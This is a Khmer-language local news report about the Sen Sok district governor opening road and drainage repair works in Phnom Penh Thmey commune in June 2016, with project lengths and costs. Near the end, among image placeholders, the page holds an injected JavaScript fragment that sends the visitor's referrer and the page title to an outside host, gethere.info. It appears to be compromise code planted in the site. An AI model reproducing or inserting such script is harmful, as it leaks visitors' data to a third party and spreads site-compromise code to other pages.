លោក ប៉ឹល កុសលអភិបាលខណ្ឌសែនសុខបានអញ្ជើញជាអធិបតីក្នុងពិធីបើកការដ្ឋានជួសជុលផ្លូវលេខ១៩៥៨

ភ្នំពេញ៖ នាព្រឹកថ្ងៃទី២៥ ខែមិថុនា ឆ្នាំ២០១៦ លោក ប៉ឹល កុសលអភិបាលខណ្ឌសែនសុខបានអញ្ជើញជាអធិបតីក្នុងពិធីបើកការដ្ឋានជួសជុលផ្លូវលេខ១៩៥៨ នៅភូមិទំនប់និងជួសជុលប្រព័ន្ធលូនៅភូមិភ្នំពេញថ្មី សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុស។

នៅក្នុងឱកាសនោះលោកចៅសង្កាត់ភ្នំពេញថ្មីបានឡើងមានមតិស្វាគមន៍ចំពោះថ្នាក់ដឹកនាំខណ្ឌសែនសុខទាំងអស់និងជម្រាបជូនរបាយការណ៍ស្ដីពីការជួសជុលផ្លូវលេខ១៩៥៨និងជួសជុលប្រព័ន្ធលូ នៅភូមិ-សង្កាត់ភ្នំពេញថ្មី។
ក្នុងនោះបានបញ្ជាក់ឲ្យដឹងពីការជួសជុលផ្លូវលេខ១៩៥៨ មានប្រវែងបណ្តោយ៥៧០ម៉ែត្រ ទទឹង៨ម៉ែត្រ ចាក់ក្រាលកៅស៊ូ AC នៅភូមិទំនប់ និងជួសជុលប្រព័ន្ធលូ១ខ្សែ ប្រវែង១២០ម៉ែត្រ មានមុខកាត់១ម៉ែត្រ នៅផ្លូវលេខ១០១៩(ភ្នំពេញ-ហាណូយ) មុខផ្សាដីហុយ ក្នុងភូមិភ្នំពេញថ្មី ដែលជាគម្រោងរបស់ខណ្ឌសែនសុខឆ្នាំ២០១៦ នៅសង្កាត់ភ្នំពេញថ្មី ដោយចំណាយថវិកាចំនួន ៧២៨,៨២៤,០០០រៀល។

ជាមួយគ្នានេះដែរ លោក ប៉ឹល កុសល អភិបាល
ខណ្ឌសែនសុខបានមានមតិក្នុងពិធីនេះដោយលើកឡើងថាលោកមានក្ដីសោមនស្សរីករាយក្រៃលេង ដែលបានចូលរួមពិធីបើកការដ្ឋានចំនួន២នាពេលនេះដែលគម្រោងទាំងនេះមានការឯកភាពពីលោក អភិបាលរាជធានីភ្នំពេញនាថ្ងៃទី១៦ ខែមិថុនា ឆ្នាំ២០១៦កន្លងទៅ។

លោកអភិបាលបញ្ជាក់ថា ក្នុងនាមរដ្ឋបាលខណ្ឌ និងប្រជាពលរដ្ឋរស់នៅក្នុងខណ្ឌសែនសុខទាំងមូលនិងក្នុងនាមលោកផ្ទាល់សូមសម្ដែងអំណរគុណយ៉ាងជ្រាលជ្រៅបំផុតចំពោះប្រមុខរាជរដ្ឋាភិបាលកម្ពុជាដែលមានសម្តេចអគ្គមហាសេនាបតីតេជោ ហ៊ុន សែន នាយករដ្ឋមន្ត្រី ជាប្រមុខដឹកនាំប្រ
ទេសដែលនាំឲ្យមានសុខសន្តិភាពនិងមានការអភិវឌ្ឍគ្រប់វិស័យដើម្បីកាត់បន្ថយភាពក្រីក្ររបស់ប្រជាពលរដ្ឋក្នុងការផ្តល់ថវិកាដល់រដ្ឋថ្នាក់ក្រោមជាតិ ពិសេសរដ្ឋបាលខណ្ឌសែនសុខជារៀងរាល់ឆ្នាំដើម្បីធ្វើការអភិវឌ្ឍនៅក្នុងមូលដ្ឋានរបស់ខ្លួនដោយផ្តោតសំខាន់ទៅលើគម្រោងជាអាទិភាពគឺ ការស្ថាបនាផ្លូវនិងការដាក់លូរំដោះទឹកដោយមានលក្ខណៈល្អប្រសើរ និងមានគុណភាពខ្ពស់បំផុត។

បន្ទាប់មកលោកអភិបាលខណ្ឌបានអញ្ជើញបើកការដ្ឋានជួសជុលផ្លូវហើយបានចុះមកពិនិត្យកន្លែង ដាក់ប្រព័ន្ធលូតាមគម្រោងខាងលើនិងបានសុំទោសដល់បងប្អូនប្រជាពលរដ្ឋដែលមានការប៉ះពាល់កន្លែងដាក់លូខាងលើផង។

ជាមួយគ្នានេះផងដែលប្រជាពលរដ្ឋក៍មានសេចក្តីត្រេកអរដែលបានឃើញអាជ្ញាធរចុះរៀបចំប្រព័ន្ធលូថ្មីជូនដល់ពួកគាត់ក្នុងមូលដ្ឋានជាមួយគ្នានោះដែលពួកគាត់ជាប្រជាពលរដ្ឋដែលរងប៉ះពាល់ខាងលើក៍សូមណូមពរដល់ក្រុមការងារដែលចុះមកដាក់លូខាងលើមេត្តាកាយដាក់លូបណ្តើរលុបបណ្តើរផងដើម្បីងាយស្រួលដល់ពួកគាត់ប្រកបរបរចិញ្ចឹមជីវិតរាក់ថ្ងៃ។

image image image image image image image image image image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More